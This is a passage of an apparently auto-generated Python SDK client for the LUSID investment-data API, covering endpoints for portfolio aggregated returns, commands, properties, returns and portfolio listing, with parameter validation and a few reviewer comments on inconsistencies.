    # parameters (scope, code, return_scope, return_code) are not — confirm
    # this matches the generator template's intent.
    if self.api_client.client_side_validation and ('aggregated_returns_request' not in local_var_params or  # noqa: E501
                                                   local_var_params['aggregated_returns_request'] is None):  # noqa: E501
        raise ApiValueError("Missing the required parameter `aggregated_returns_request` when calling `get_portfolio_aggregated_returns`")  # noqa: E501

    collection_formats = {}

    # Path parameters are keyed by their camelCase wire names, which the
    # URL template below substitutes.
    path_params = {}
    if 'scope' in local_var_params:
        path_params['scope'] = local_var_params['scope']  # noqa: E501
    if 'code' in local_var_params:
        path_params['code'] = local_var_params['code']  # noqa: E501
    if 'return_scope' in local_var_params:
        path_params['returnScope'] = local_var_params['return_scope']  # noqa: E501
    if 'return_code' in local_var_params:
        path_params['returnCode'] = local_var_params['return_code']  # noqa: E501

    # Optional query parameters are only appended when supplied and non-None.
    query_params = []
    if 'from_effective_at' in local_var_params and local_var_params['from_effective_at'] is not None:  # noqa: E501
        query_params.append(('fromEffectiveAt', local_var_params['from_effective_at']))  # noqa: E501
    if 'to_effective_at' in local_var_params and local_var_params['to_effective_at'] is not None:  # noqa: E501
        query_params.append(('toEffectiveAt', local_var_params['to_effective_at']))  # noqa: E501
    if 'as_at' in local_var_params and local_var_params['as_at'] is not None:  # noqa: E501
        query_params.append(('asAt', local_var_params['as_at']))  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    # The AggregatedReturnsRequest is serialized as the JSON request body.
    body_params = None
    if 'aggregated_returns_request' in local_var_params:
        body_params = local_var_params['aggregated_returns_request']
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['text/plain', 'application/json', 'text/json'])  # noqa: E501
    header_params['Accept-Encoding'] = "gzip, deflate, br"

    # HTTP header `Content-Type`
    header_params['Content-Type'] = self.api_client.select_header_content_type(  # noqa: E501
        ['application/json-patch+json', 'application/json', 'text/json', 'application/*+json'])  # noqa: E501

    # set the LUSID header
    header_params['X-LUSID-SDK-Language'] = 'Python'
    header_params['X-LUSID-SDK-Version'] = '0.11.3648'

    # Authentication setting
    auth_settings = ['oauth2']  # noqa: E501

    # Maps HTTP status codes to the model each response body deserializes into.
    response_types_map = {
        200: "ResourceListOfAggregatedReturn",
        400: "LusidValidationProblemDetails",
    }

    return self.api_client.call_api(
        '/api/portfolios/{scope}/{code}/returns/{returnScope}/{returnCode}/$aggregated', 'POST',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_types_map=response_types_map,
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats,
        _request_auth=local_var_params.get('_request_auth'))
def get_portfolio_commands(self, scope, code, **kwargs):  # noqa: E501
    """[EARLY ACCESS] GetPortfolioCommands: Get portfolio commands  # noqa: E501

    Get all the commands that modified a particular portfolio, including any input transactions.  # noqa: E501

    Convenience wrapper around ``get_portfolio_commands_with_http_info``
    that returns only the deserialized response body (no status code or
    headers). The request is synchronous by default; pass async_req=True
    to get a thread back:

    >>> thread = api.get_portfolio_commands(scope, code, async_req=True)
    >>> result = thread.get()

    :param scope: The scope of the portfolio. (required)
    :type scope: str
    :param code: The code of the portfolio. Together with the scope this uniquely identifies the portfolio. (required)
    :type code: str
    :param from_as_at: The lower bound asAt datetime (inclusive) from which to retrieve commands. There is no lower bound if this is not specified.
    :type from_as_at: datetime
    :param to_as_at: The upper bound asAt datetime (inclusive) from which to retrieve commands. There is no upper bound if this is not specified.
    :type to_as_at: datetime
    :param filter: Expression to filter the results. For example, to filter on the User ID, specify \"userId.id eq 'string'\". For more information about filtering, see https://support.lusid.com/knowledgebase/article/KA-01914.
    :type filter: str
    :param page: The pagination token to use to continue listing commands; this value is returned from the previous call.
    :type page: str
    :param limit: When paginating, limit the results to this number. Defaults to 500 if not specified.
    :type limit: int
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: Returns the result object.
             If the method is called asynchronously,
             returns the request thread.
    :rtype: ResourceListOfProcessedCommand
    """
    # Ask the low-level call to hand back only the deserialized body.
    kwargs.update(_return_http_data_only=True)
    return self.get_portfolio_commands_with_http_info(scope, code, **kwargs)  # noqa: E501
def get_portfolio_commands_with_http_info(self, scope, code, **kwargs):  # noqa: E501
    """[EARLY ACCESS] GetPortfolioCommands: Get portfolio commands  # noqa: E501

    Get all the commands that modified a particular portfolio, including any input transactions.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_portfolio_commands_with_http_info(scope, code, async_req=True)
    >>> result = thread.get()

    :param scope: The scope of the portfolio. (required)
    :type scope: str
    :param code: The code of the portfolio. Together with the scope this uniquely identifies the portfolio. (required)
    :type code: str
    :param from_as_at: The lower bound asAt datetime (inclusive) from which to retrieve commands. There is no lower bound if this is not specified.
    :type from_as_at: datetime
    :param to_as_at: The upper bound asAt datetime (inclusive) from which to retrieve commands. There is no upper bound if this is not specified.
    :type to_as_at: datetime
    :param filter: Expression to filter the results. For example, to filter on the User ID, specify \"userId.id eq 'string'\". For more information about filtering, see https://support.lusid.com/knowledgebase/article/KA-01914.
    :type filter: str
    :param page: The pagination token to use to continue listing commands; this value is returned from the previous call.
    :type page: str
    :param limit: When paginating, limit the results to this number. Defaults to 500 if not specified.
    :type limit: int
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _return_http_data_only: response data without head status code
                                   and headers
    :type _return_http_data_only: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :param _request_auth: set to override the auth_settings for an a single
                          request; this effectively ignores the authentication
                          in the spec for a single request.
    :type _request_auth: dict, optional
    :return: Returns the result object.
             If the method is called asynchronously,
             returns the request thread.
    :rtype: tuple(ResourceListOfProcessedCommand, status_code(int), headers(HTTPHeaderDict))
    """
    # Must be the first statement: snapshot every declared parameter
    # (including 'self' and the raw 'kwargs' dict) by name; the rest of
    # the method indexes this mapping with parameter-name strings.
    local_var_params = locals()

    # Parameters this endpoint accepts, in API order.
    all_params = [
        'scope',
        'code',
        'from_as_at',
        'to_as_at',
        'filter',
        'page',
        'limit'
    ]
    # Transport-level options accepted by every generated endpoint.
    all_params.extend(
        [
            'async_req',
            '_return_http_data_only',
            '_preload_content',
            '_request_timeout',
            '_request_auth'
        ]
    )

    # Reject unknown keyword arguments, then flatten the accepted ones
    # into local_var_params alongside the positional parameters.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_portfolio_commands" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']

    # Client-side validation: scope and code must be 1-64 characters of
    # [a-zA-Z0-9-_]; limit, when given, must be within 1..5000.
    if self.api_client.client_side_validation and ('scope' in local_var_params and  # noqa: E501
                                                   len(local_var_params['scope']) > 64):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `scope` when calling `get_portfolio_commands`, length must be less than or equal to `64`")  # noqa: E501
    if self.api_client.client_side_validation and ('scope' in local_var_params and  # noqa: E501
                                                   len(local_var_params['scope']) < 1):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `scope` when calling `get_portfolio_commands`, length must be greater than or equal to `1`")  # noqa: E501
    if self.api_client.client_side_validation and 'scope' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['scope']):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `scope` when calling `get_portfolio_commands`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`")  # noqa: E501
    if self.api_client.client_side_validation and ('code' in local_var_params and  # noqa: E501
                                                   len(local_var_params['code']) > 64):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `code` when calling `get_portfolio_commands`, length must be less than or equal to `64`")  # noqa: E501
    if self.api_client.client_side_validation and ('code' in local_var_params and  # noqa: E501
                                                   len(local_var_params['code']) < 1):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `code` when calling `get_portfolio_commands`, length must be greater than or equal to `1`")  # noqa: E501
    if self.api_client.client_side_validation and 'code' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['code']):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `code` when calling `get_portfolio_commands`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`")  # noqa: E501
    if self.api_client.client_side_validation and 'limit' in local_var_params and local_var_params['limit'] > 5000:  # noqa: E501
        raise ApiValueError("Invalid value for parameter `limit` when calling `get_portfolio_commands`, must be a value less than or equal to `5000`")  # noqa: E501
    if self.api_client.client_side_validation and 'limit' in local_var_params and local_var_params['limit'] < 1:  # noqa: E501
        raise ApiValueError("Invalid value for parameter `limit` when calling `get_portfolio_commands`, must be a value greater than or equal to `1`")  # noqa: E501

    collection_formats = {}

    # Path parameters substituted into the URL template below.
    path_params = {}
    if 'scope' in local_var_params:
        path_params['scope'] = local_var_params['scope']  # noqa: E501
    if 'code' in local_var_params:
        path_params['code'] = local_var_params['code']  # noqa: E501

    # Optional query parameters are only appended when supplied and non-None.
    query_params = []
    if 'from_as_at' in local_var_params and local_var_params['from_as_at'] is not None:  # noqa: E501
        query_params.append(('fromAsAt', local_var_params['from_as_at']))  # noqa: E501
    if 'to_as_at' in local_var_params and local_var_params['to_as_at'] is not None:  # noqa: E501
        query_params.append(('toAsAt', local_var_params['to_as_at']))  # noqa: E501
    if 'filter' in local_var_params and local_var_params['filter'] is not None:  # noqa: E501
        query_params.append(('filter', local_var_params['filter']))  # noqa: E501
    if 'page' in local_var_params and local_var_params['page'] is not None:  # noqa: E501
        query_params.append(('page', local_var_params['page']))  # noqa: E501
    if 'limit' in local_var_params and local_var_params['limit'] is not None:  # noqa: E501
        query_params.append(('limit', local_var_params['limit']))  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    # GET request: no body is sent.
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['text/plain', 'application/json', 'text/json'])  # noqa: E501
    header_params['Accept-Encoding'] = "gzip, deflate, br"

    # Authentication setting
    auth_settings = ['oauth2']  # noqa: E501

    # Maps HTTP status codes to the model each response body deserializes into.
    response_types_map = {
        200: "ResourceListOfProcessedCommand",
        400: "LusidValidationProblemDetails",
    }

    return self.api_client.call_api(
        '/api/portfolios/{scope}/{code}/commands', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_types_map=response_types_map,
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats,
        _request_auth=local_var_params.get('_request_auth'))
def get_portfolio_properties(self, scope, code, **kwargs):  # noqa: E501
    """GetPortfolioProperties: Get portfolio properties  # noqa: E501

    List all the properties of a particular portfolio.  # noqa: E501

    Convenience wrapper around ``get_portfolio_properties_with_http_info``
    that returns only the deserialized response body (no status code or
    headers). The request is synchronous by default; pass async_req=True
    to get a thread back:

    >>> thread = api.get_portfolio_properties(scope, code, async_req=True)
    >>> result = thread.get()

    :param scope: The scope of the portfolio. (required)
    :type scope: str
    :param code: The code of the portfolio. Together with the scope this uniquely identifies the portfolio. (required)
    :type code: str
    :param effective_at: The effective datetime or cut label at which to list the portfolio's properties. Defaults to the current LUSID system datetime if not specified.
    :type effective_at: str
    :param as_at: The asAt datetime at which to list the portfolio's properties. Defaults to returning the latest version of each property if not specified.
    :type as_at: datetime
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: Returns the result object.
             If the method is called asynchronously,
             returns the request thread.
    :rtype: PortfolioProperties
    """
    # Ask the low-level call to hand back only the deserialized body.
    kwargs.update(_return_http_data_only=True)
    return self.get_portfolio_properties_with_http_info(scope, code, **kwargs)  # noqa: E501
def get_portfolio_properties_with_http_info(self, scope, code, **kwargs):  # noqa: E501
    """GetPortfolioProperties: Get portfolio properties  # noqa: E501

    List all the properties of a particular portfolio.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_portfolio_properties_with_http_info(scope, code, async_req=True)
    >>> result = thread.get()

    :param scope: The scope of the portfolio. (required)
    :type scope: str
    :param code: The code of the portfolio. Together with the scope this uniquely identifies the portfolio. (required)
    :type code: str
    :param effective_at: The effective datetime or cut label at which to list the portfolio's properties. Defaults to the current LUSID system datetime if not specified.
    :type effective_at: str
    :param as_at: The asAt datetime at which to list the portfolio's properties. Defaults to returning the latest version of each property if not specified.
    :type as_at: datetime
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _return_http_data_only: response data without head status code
                                   and headers
    :type _return_http_data_only: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :param _request_auth: set to override the auth_settings for an a single
                          request; this effectively ignores the authentication
                          in the spec for a single request.
    :type _request_auth: dict, optional
    :return: Returns the result object.
             If the method is called asynchronously,
             returns the request thread.
    :rtype: tuple(PortfolioProperties, status_code(int), headers(HTTPHeaderDict))
    """
    # Must be the first statement: snapshot every declared parameter
    # (including 'self' and the raw 'kwargs' dict) by name; the rest of
    # the method indexes this mapping with parameter-name strings.
    local_var_params = locals()

    # Parameters this endpoint accepts, in API order.
    all_params = [
        'scope',
        'code',
        'effective_at',
        'as_at'
    ]
    # Transport-level options accepted by every generated endpoint.
    all_params.extend(
        [
            'async_req',
            '_return_http_data_only',
            '_preload_content',
            '_request_timeout',
            '_request_auth'
        ]
    )

    # Reject unknown keyword arguments, then flatten the accepted ones
    # into local_var_params alongside the positional parameters.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_portfolio_properties" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']

    # Client-side validation: scope and code must be 1-64 characters of
    # [a-zA-Z0-9-_].
    if self.api_client.client_side_validation and ('scope' in local_var_params and  # noqa: E501
                                                   len(local_var_params['scope']) > 64):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `scope` when calling `get_portfolio_properties`, length must be less than or equal to `64`")  # noqa: E501
    if self.api_client.client_side_validation and ('scope' in local_var_params and  # noqa: E501
                                                   len(local_var_params['scope']) < 1):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `scope` when calling `get_portfolio_properties`, length must be greater than or equal to `1`")  # noqa: E501
    if self.api_client.client_side_validation and 'scope' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['scope']):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `scope` when calling `get_portfolio_properties`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`")  # noqa: E501
    if self.api_client.client_side_validation and ('code' in local_var_params and  # noqa: E501
                                                   len(local_var_params['code']) > 64):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `code` when calling `get_portfolio_properties`, length must be less than or equal to `64`")  # noqa: E501
    if self.api_client.client_side_validation and ('code' in local_var_params and  # noqa: E501
                                                   len(local_var_params['code']) < 1):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `code` when calling `get_portfolio_properties`, length must be greater than or equal to `1`")  # noqa: E501
    if self.api_client.client_side_validation and 'code' in local_var_params and not re.search(r'^[a-zA-Z0-9\-_]+$', local_var_params['code']):  # noqa: E501
        raise ApiValueError("Invalid value for parameter `code` when calling `get_portfolio_properties`, must conform to the pattern `/^[a-zA-Z0-9\-_]+$/`")  # noqa: E501

    collection_formats = {}

    # Path parameters substituted into the URL template below.
    path_params = {}
    if 'scope' in local_var_params:
        path_params['scope'] = local_var_params['scope']  # noqa: E501
    if 'code' in local_var_params:
        path_params['code'] = local_var_params['code']  # noqa: E501

    # Optional query parameters are only appended when supplied and non-None.
    query_params = []
    if 'effective_at' in local_var_params and local_var_params['effective_at'] is not None:  # noqa: E501
        query_params.append(('effectiveAt', local_var_params['effective_at']))  # noqa: E501
    if 'as_at' in local_var_params and local_var_params['as_at'] is not None:  # noqa: E501
        query_params.append(('asAt', local_var_params['as_at']))  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    # GET request: no body is sent.
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['text/plain', 'application/json', 'text/json'])  # noqa: E501
    header_params['Accept-Encoding'] = "gzip, deflate, br"

    # Authentication setting
    auth_settings = ['oauth2']  # noqa: E501

    # Maps HTTP status codes to the model each response body deserializes into.
    response_types_map = {
        200: "PortfolioProperties",
        400: "LusidValidationProblemDetails",
    }

    return self.api_client.call_api(
        '/api/portfolios/{scope}/{code}/properties', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_types_map=response_types_map,
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats,
        _request_auth=local_var_params.get('_request_auth'))
def get_portfolio_returns(self, scope, code, return_scope, return_code, **kwargs):  # noqa: E501
    """[EARLY ACCESS] GetPortfolioReturns: Get Returns  # noqa: E501

    Get Returns which are on the specified portfolio.  # noqa: E501

    Convenience wrapper around ``get_portfolio_returns_with_http_info``
    that returns only the deserialized response body (no status code or
    headers). The request is synchronous by default; pass async_req=True
    to get a thread back:

    >>> thread = api.get_portfolio_returns(scope, code, return_scope, return_code, async_req=True)
    >>> result = thread.get()

    :param scope: The scope of the Portfolio. (required)
    :type scope: str
    :param code: The code of the Portfolio. (required)
    :type code: str
    :param return_scope: The scope of the Returns. (required)
    :type return_scope: str
    :param return_code: The code of the Returns. (required)
    :type return_code: str
    :param from_effective_at: The start date from which to get the Returns.
    :type from_effective_at: str
    :param to_effective_at: The end date from which to get the Returns.
    :type to_effective_at: str
    :param period: Show the Returns on a Daily or Monthly period. Defaults to Daily.
    :type period: str
    :param as_at: The asAt datetime at which to retrieve the Returns. Defaults to the latest.
    :type as_at: datetime
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: Returns the result object.
             If the method is called asynchronously,
             returns the request thread.
    :rtype: ResourceListOfPerformanceReturn
    """
    # Ask the low-level call to hand back only the deserialized body.
    kwargs.update(_return_http_data_only=True)
    return self.get_portfolio_returns_with_http_info(
        scope, code, return_scope, return_code, **kwargs)  # noqa: E501
def get_portfolio_returns_with_http_info(self, scope, code, return_scope, return_code, **kwargs):  # noqa: E501
    """[EARLY ACCESS] GetPortfolioReturns: Get Returns  # noqa: E501

    Get Returns which are on the specified portfolio.  # noqa: E501
    This method makes a synchronous HTTP request by default. To make an
    asynchronous HTTP request, please pass async_req=True

    >>> thread = api.get_portfolio_returns_with_http_info(scope, code, return_scope, return_code, async_req=True)
    >>> result = thread.get()

    :param scope: The scope of the Portfolio. (required)
    :type scope: str
    :param code: The code of the Portfolio. (required)
    :type code: str
    :param return_scope: The scope of the Returns. (required)
    :type return_scope: str
    :param return_code: The code of the Returns. (required)
    :type return_code: str
    :param from_effective_at: The start date from which to get the Returns.
    :type from_effective_at: str
    :param to_effective_at: The end date from which to get the Returns.
    :type to_effective_at: str
    :param period: Show the Returns on a Daily or Monthly period. Defaults to Daily.
    :type period: str
    :param as_at: The asAt datetime at which to retrieve the Returns. Defaults to the latest.
    :type as_at: datetime
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _return_http_data_only: response data without head status code
                                   and headers
    :type _return_http_data_only: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :param _request_auth: set to override the auth_settings for an a single
                          request; this effectively ignores the authentication
                          in the spec for a single request.
    :type _request_auth: dict, optional
    :return: Returns the result object.
             If the method is called asynchronously,
             returns the request thread.
    :rtype: tuple(ResourceListOfPerformanceReturn, status_code(int), headers(HTTPHeaderDict))
    """
    # Must be the first statement: snapshot every declared parameter
    # (including 'self' and the raw 'kwargs' dict) by name; the rest of
    # the method indexes this mapping with parameter-name strings.
    local_var_params = locals()

    # Parameters this endpoint accepts, in API order.
    all_params = [
        'scope',
        'code',
        'return_scope',
        'return_code',
        'from_effective_at',
        'to_effective_at',
        'period',
        'as_at'
    ]
    # Transport-level options accepted by every generated endpoint.
    all_params.extend(
        [
            'async_req',
            '_return_http_data_only',
            '_preload_content',
            '_request_timeout',
            '_request_auth'
        ]
    )

    # Reject unknown keyword arguments, then flatten the accepted ones
    # into local_var_params alongside the positional parameters.
    for key, val in six.iteritems(local_var_params['kwargs']):
        if key not in all_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method get_portfolio_returns" % key
            )
        local_var_params[key] = val
    del local_var_params['kwargs']

    # NOTE(review): this endpoint performs no client-side validation (no
    # length/pattern checks on scope or code), unlike sibling endpoints in
    # this class — confirm this matches the API specification.
    collection_formats = {}

    # Path parameters are keyed by their camelCase wire names, which the
    # URL template below substitutes.
    path_params = {}
    if 'scope' in local_var_params:
        path_params['scope'] = local_var_params['scope']  # noqa: E501
    if 'code' in local_var_params:
        path_params['code'] = local_var_params['code']  # noqa: E501
    if 'return_scope' in local_var_params:
        path_params['returnScope'] = local_var_params['return_scope']  # noqa: E501
    if 'return_code' in local_var_params:
        path_params['returnCode'] = local_var_params['return_code']  # noqa: E501

    # Optional query parameters are only appended when supplied and non-None.
    query_params = []
    if 'from_effective_at' in local_var_params and local_var_params['from_effective_at'] is not None:  # noqa: E501
        query_params.append(('fromEffectiveAt', local_var_params['from_effective_at']))  # noqa: E501
    if 'to_effective_at' in local_var_params and local_var_params['to_effective_at'] is not None:  # noqa: E501
        query_params.append(('toEffectiveAt', local_var_params['to_effective_at']))  # noqa: E501
    if 'period' in local_var_params and local_var_params['period'] is not None:  # noqa: E501
        query_params.append(('period', local_var_params['period']))  # noqa: E501
    if 'as_at' in local_var_params and local_var_params['as_at'] is not None:  # noqa: E501
        query_params.append(('asAt', local_var_params['as_at']))  # noqa: E501

    header_params = {}

    form_params = []
    local_var_files = {}

    # GET request: no body is sent.
    body_params = None
    # HTTP header `Accept`
    header_params['Accept'] = self.api_client.select_header_accept(
        ['text/plain', 'application/json', 'text/json'])  # noqa: E501
    header_params['Accept-Encoding'] = "gzip, deflate, br"

    # Authentication setting
    auth_settings = ['oauth2']  # noqa: E501

    # Maps HTTP status codes to the model each response body deserializes into.
    response_types_map = {
        200: "ResourceListOfPerformanceReturn",
        400: "LusidValidationProblemDetails",
    }

    return self.api_client.call_api(
        '/api/portfolios/{scope}/{code}/returns/{returnScope}/{returnCode}', 'GET',
        path_params,
        query_params,
        header_params,
        body=body_params,
        post_params=form_params,
        files=local_var_files,
        response_types_map=response_types_map,
        auth_settings=auth_settings,
        async_req=local_var_params.get('async_req'),
        _return_http_data_only=local_var_params.get('_return_http_data_only'),  # noqa: E501
        _preload_content=local_var_params.get('_preload_content', True),
        _request_timeout=local_var_params.get('_request_timeout'),
        collection_formats=collection_formats,
        _request_auth=local_var_params.get('_request_auth'))
def list_portfolios(self, **kwargs):  # noqa: E501
    """ListPortfolios: List portfolios  # noqa: E501

    List all the portfolios matching particular criteria.  # noqa: E501

    Convenience wrapper around ``list_portfolios_with_http_info`` that
    returns only the deserialized response body (no status code or
    headers). The request is synchronous by default; pass async_req=True
    to get a thread back:

    >>> thread = api.list_portfolios(async_req=True)
    >>> result = thread.get()

    :param effective_at: The effective datetime or cut label at which to list the portfolios. Defaults to the current LUSID system datetime if not specified.
    :type effective_at: str
    :param as_at: The asAt datetime at which to list the portfolios. Defaults to returning the latest version of each portfolio if not specified.
    :type as_at: datetime
    :param page: The pagination token to use to continue listing portfolios; this value is returned from the previous call. If a pagination token is provided, the filter, effectiveAt and asAt fields must not have changed since the original request. Also, if set, a start value cannot be provided.
    :type page: str
    :param start: When paginating, skip this number of results.
    :type start: int
    :param limit: When paginating, limit the results to this number. Defaults to 65,535 if not specified.
    :type limit: int
    :param filter: Expression to filter the results. For example, to filter on the transaction type, specify \"type eq 'Transaction'\". For more information about filtering results, see https://support.lusid.com/knowledgebase/article/KA-01914.
    :type filter: str
    :param query: Expression specifying the criteria that the returned portfolios must meet. For example, to see which portfolios have holdings in instruments with a LusidInstrumentId (LUID) of 'LUID_PPA8HI6M' or a Figi of 'BBG000BLNNH6', specify \"instrument.identifiers in (('LusidInstrumentId', 'LUID_PPA8HI6M'), ('Figi', 'BBG000BLNNH6'))\".
    :type query: str
    :param property_keys: A list of property keys from the 'Portfolio' domain to decorate onto each portfolio. These must take the format {domain}/{scope}/{code}, for example 'Portfolio/Manager/Id'.
    :type property_keys: list[str]
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _preload_content: if False, the urllib3.HTTPResponse object will
                             be returned without reading/decoding response
                             data. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: timeout setting for this request. If one
                             number provided, it will be total request
                             timeout. It can also be a pair (tuple) of
                             (connection, read) timeouts.
    :return: Returns the result object.
             If the method is called asynchronously,
             returns the request thread.
    :rtype: ResourceListOfPortfolio
    """
    # Ask the low-level call to hand back only the deserialized body.
    kwargs.update(_return_http_data_only=True)
    return self.list_portfolios_with_http_info(**kwargs)  # noqa: E501
def list_portfolios_with_http_info(self, **kwargs):  # noqa: E501
    """ListPortfolios: List portfolios  # noqa: E501

    List all the portfolios matching particular criteria.

    Synchronous by default; pass async_req=True for an asynchronous call:

    >>> thread = api.list_portfolios_with_http_info(async_req=True)
    >>> result = thread.get()

    :param effective_at: The effective datetime or cut label at which to list
        the portfolios. Defaults to the current LUSID system datetime.
    :type effective_at: str
    :param as_at: The asAt datetime at which to list the portfolios. Defaults
        to the latest version of each portfolio.
    :type as_at: datetime
    :param page: Pagination token returned from the previous call. If a token
        is supplied, the filter, effectiveAt and asAt fields must match the
        original request, and start must not be set.
    :type page: str
    :param start: When paginating, skip this number of results.
    :type start: int
    :param limit: When paginating, limit the results to this number.
        NOTE(review): upstream docs state a default of 65,535, but the
        client-side validation below rejects values above 5000 — confirm
        against the API spec.
    :type limit: int
    :param filter: Expression to filter the results, for example
        "type eq 'Transaction'". See
        https://support.lusid.com/knowledgebase/article/KA-01914.
    :type filter: str
    :param query: Expression the returned portfolios must satisfy, for
        example "instrument.identifiers in (('LusidInstrumentId',
        'LUID_PPA8HI6M'), ('Figi', 'BBG000BLNNH6'))".
    :type query: str
    :param property_keys: Property keys from the 'Portfolio' domain to
        decorate onto each portfolio, in the format {domain}/{scope}/{code},
        e.g. 'Portfolio/Manager/Id'.
    :type property_keys: list[str]
    :param async_req: Whether to execute the request asynchronously.
    :type async_req: bool, optional
    :param _return_http_data_only: return the response data without status
        code and headers
    :type _return_http_data_only: bool, optional
    :param _preload_content: if False, return the raw urllib3.HTTPResponse
        object without reading/decoding it. Default is True.
    :type _preload_content: bool, optional
    :param _request_timeout: total request timeout (single number) or a
        (connection, read) tuple of timeouts.
    :param _request_auth: overrides the spec's auth_settings for this single
        request.
    :type _request_auth: dict, optional
    :return: Returns the result object, or the request thread when called
        asynchronously.
    :rtype: tuple(ResourceListOfPortfolio, status_code(int), headers(HTTPHeaderDict))
    """
    known_params = [
        'effective_at',
        'as_at',
        'page',
        'start',
        'limit',
        'filter',
        'query',
        'property_keys',
        # framework options accepted by every endpoint
        'async_req',
        '_return_http_data_only',
        '_preload_content',
        '_request_timeout',
        '_request_auth',
    ]
    # Reject any keyword the endpoint does not understand.
    for key in kwargs:
        if key not in known_params:
            raise ApiTypeError(
                "Got an unexpected keyword argument '%s'"
                " to method list_portfolios" % key
            )
    local_var_params = dict(kwargs)

    validate = self.api_client.client_side_validation
    if validate and 'limit' in local_var_params and local_var_params['limit'] > 5000:  # noqa: E501
        raise ApiValueError("Invalid value for parameter `limit` when calling `list_portfolios`, must be a value less than or equal to `5000`")  # noqa: E501
    if validate and 'limit' in local_var_params and local_var_params['limit'] < 1:  # noqa: E501
        raise ApiValueError("Invalid value for parameter `limit` when calling `list_portfolios`, must be a value greater than or equal to `1`")  # noqa: E501

